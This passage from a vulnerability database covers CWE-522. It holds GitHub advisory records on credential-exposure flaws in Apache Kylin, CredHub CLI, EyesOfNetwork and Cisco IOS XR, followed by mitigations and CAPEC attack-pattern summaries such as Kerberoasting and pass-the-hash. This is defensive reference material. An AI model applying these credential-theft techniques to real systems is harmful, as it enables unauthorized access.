"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-24T15:15:00Z",
"severity": "MODERATE"
},
"details": "The default password for the web application\u2019s root user (the vendor\u2019s private account) was weak and the MD5 hash was used to crack the password using a widely available open-source tool.",
"id": "GHSA-3v6j-9mf5-wv3f",
"modified": "2022-07-06T00:00:30Z",
"published": "2022-06-25T00:00:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1666"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-3VVC-V8C2-43R7
Vulnerability from github – Published: 2024-01-29 15:30 – Updated: 2025-02-13 19:33In Apache Kylin version 2.0.0 to 4.0.3, there is a Server Config web interface that displays the content of file 'kylin.properties', that may contain serverside credentials. When the kylin service runs over HTTP (or other plain text protocol), it is possible for network sniffers to hijack the HTTP payload and get access to the content of kylin.properties and potentially the containing credentials.
To avoid this threat, users are recommended to
-
Always turn on HTTPS so that network payload is encrypted.
-
Avoid putting credentials in kylin.properties, or at least not in plain text.
-
Use network firewalls to protect the serverside such that it is not accessible to external attackers.
-
Upgrade to version Apache Kylin 4.0.4, which filters out the sensitive content that goes to the Server Config web interface.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.kylin:kylin-core-common"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "4.0.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-29055"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-29T22:29:38Z",
"nvd_published_at": "2024-01-29T13:15:07Z",
"severity": "HIGH"
},
"details": "In Apache Kylin version 2.0.0 to 4.0.3, there is a Server Config web interface that displays the content of file \u0027kylin.properties\u0027, that may contain serverside credentials. When the kylin service runs over HTTP (or other plain text protocol), it is possible for network sniffers to hijack the HTTP payload and get access to the content of kylin.properties and potentially the containing credentials.\n\nTo avoid this threat, users are recommended to\u00a0\n\n * Always turn on HTTPS so that network payload is encrypted.\n\n * Avoid putting credentials in kylin.properties, or at least not in plain text.\n * Use network firewalls to protect the serverside such that it is not accessible to external attackers.\n\n * Upgrade to version Apache Kylin 4.0.4, which filters out the sensitive content that goes to the Server Config web interface.",
"id": "GHSA-3vvc-v8c2-43r7",
"modified": "2025-02-13T19:33:17Z",
"published": "2024-01-29T15:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29055"
},
{
"type": "WEB",
"url": "https://github.com/apache/kylin/commit/b60d5ae694dffc2281bfe0ef464eada0b3a9b774"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/kylin"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/o1bvyv9wnfkx7dxpfjlor20nykgsoh6r"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2024/01/29/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Apache Kylin has Insufficiently Protected Credentials"
}
GHSA-3VVH-RCX9-VCX3
Vulnerability from github – Published: 2022-05-13 01:14 – Updated: 2022-05-13 01:14Cloud Foundry CredHub CLI, versions prior to 2.2.1, inadvertently writes authentication credentials provided via environment variables to its persistent config file. A local authenticated malicious user with access to the CredHub CLI config file can use these credentials to retrieve and modify credentials stored in CredHub that are authorized to the targeted user.
{
"affected": [],
"aliases": [
"CVE-2019-3782"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-02-13T16:29:00Z",
"severity": "HIGH"
},
"details": "Cloud Foundry CredHub CLI, versions prior to 2.2.1, inadvertently writes authentication credentials provided via environment variables to its persistent config file. A local authenticated malicious user with access to the CredHub CLI config file can use these credentials to retrieve and modify credentials stored in CredHub that are authorized to the targeted user.",
"id": "GHSA-3vvh-rcx9-vcx3",
"modified": "2022-05-13T01:14:29Z",
"published": "2022-05-13T01:14:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3782"
},
{
"type": "WEB",
"url": "https://www.cloudfoundry.org/blog/cve-2019-3782"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/107038"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3W5R-GMMJ-PRC2
Vulnerability from github – Published: 2022-05-24 17:08 – Updated: 2025-10-22 00:31An issue was discovered in EyesOfNetwork 5.3. The installation uses the same API key (hardcoded as EONAPI_KEY in include/api_functions.php for API version 2.4.2) by default for all installations, hence allowing an attacker to calculate/guess the admin access token.
{
"affected": [],
"aliases": [
"CVE-2020-8657"
],
"database_specific": {
"cwe_ids": [
"CWE-522",
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-02-06T18:15:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in EyesOfNetwork 5.3. The installation uses the same API key (hardcoded as EONAPI_KEY in include/api_functions.php for API version 2.4.2) by default for all installations, hence allowing an attacker to calculate/guess the admin access token.",
"id": "GHSA-3w5r-gmmj-prc2",
"modified": "2025-10-22T00:31:50Z",
"published": "2022-05-24T17:08:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8657"
},
{
"type": "WEB",
"url": "https://github.com/EyesOfNetworkCommunity/eonapi/issues/17"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-8657"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3WFW-CF7H-38C7
Vulnerability from github – Published: 2024-09-11 18:31 – Updated: 2024-09-11 18:31A vulnerability in the storage method of the PON Controller configuration file could allow an authenticated, local attacker with low privileges to obtain the MongoDB credentials.
This vulnerability is due to improper storage of the unencrypted database credentials on the device that is running Cisco IOS XR Software. An attacker could exploit this vulnerability by accessing the configuration files on an affected system. A successful exploit could allow the attacker to view MongoDB credentials.
{
"affected": [],
"aliases": [
"CVE-2024-20489"
],
"database_specific": {
"cwe_ids": [
"CWE-256",
"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-11T17:15:13Z",
"severity": "HIGH"
},
"details": "A vulnerability in the storage method of the PON Controller configuration file could allow an authenticated, local attacker with low privileges to obtain the MongoDB credentials.\n\nThis vulnerability is due to improper storage of the unencrypted database credentials on the device that is running Cisco IOS XR Software. An attacker could exploit this vulnerability by accessing the configuration files on an affected system. A successful exploit could allow the attacker to view MongoDB credentials.",
"id": "GHSA-3wfw-cf7h-38c7",
"modified": "2024-09-11T18:31:08Z",
"published": "2024-09-11T18:31:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20489"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-ponctlr-ci-OHcHmsFL"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
Use an appropriate security mechanism to protect the credentials.
Mitigation
Make appropriate use of cryptography to protect the credentials.
Mitigation
Use industry standards to protect the credentials (e.g. LDAP, keystore, etc.).
CAPEC-102: Session Sidejacking
Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.
CAPEC-474: Signature Spoofing by Key Theft
An attacker obtains an authoritative or reputable signer's private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.
CAPEC-50: Password Recovery Exploitation
An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure.
CAPEC-509: Kerberoasting
Through the exploitation of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs), the adversary obtains and subsequently cracks the hashed credentials of a service account target to exploit its privileges. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. As an authenticated user, the adversary may request Active Directory and obtain a service ticket with portions encrypted via RC4 with the private key of the authenticated account. By extracting the local ticket and saving it disk, the adversary can brute force the hashed value to reveal the target account credentials.
CAPEC-551: Modify Existing Service
When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.
CAPEC-555: Remote Services with Stolen Credentials
This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.
CAPEC-560: Use of Known Domain Credentials
An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service.
CAPEC-561: Windows Admin Shares with Stolen Credentials
An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows administrator credentials (e.g. userID/password) to access Windows Admin Shares on a local machine or within a Windows domain.
CAPEC-600: Credential Stuffing
An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.
CAPEC-644: Use of Captured Hashes (Pass The Hash)
An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.
CAPEC-645: Use of Captured Tickets (Pass The Ticket)
An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.
CAPEC-652: Use of Known Kerberos Credentials
An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain.
CAPEC-653: Use of Known Operating System Credentials
An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. This applies to any Operating System.